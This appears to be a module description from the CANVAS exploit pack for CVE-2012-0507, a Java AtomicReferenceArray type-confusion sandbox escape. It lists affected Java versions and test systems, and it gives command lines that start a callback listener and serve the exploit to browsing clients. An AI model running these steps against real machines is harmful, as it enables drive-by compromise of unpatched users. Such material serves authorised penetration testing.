Immunity, Inc.
Name: java_AtomicReferenceArray
CVE: CVE-2012-0507
Exploit Pack: CANVAS
Description: Java AtomicReferenceArray Type Confusion Sandbox Bypass
Notes: CVE Name: CVE-2012-0507
VENDOR: Sun
Notes:
There is a type confusion vulnerability in the java.util.concurrent.atomic.AtomicReferenceArray class.
When creating a new instance of an AtomicReferenceArray the array type has to be specified; however, the AtomicReferenceArray.set method does not properly check the type of the object being inserted.
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager and escape the sandbox.

Affected versions
JDK and JRE 7 Update 2 and earlier
JDK and JRE 6 Update 30 and earlier
JDK and JRE 5.0 Update 33 and earlier
SDK and JRE 1.4.2_35 and earlier

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 1
- Windows 7 SP1 with JDK/JRE 6 update 29
- Windows 7 SP1 with JDK/JRE 5 update 22
- Windows XP SP3 with JDK/JRE 7 and 7 update 1

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0


Repeatability: Infinite (client side - no crash)
References:
http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3
http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
Date public: 02/14/2012
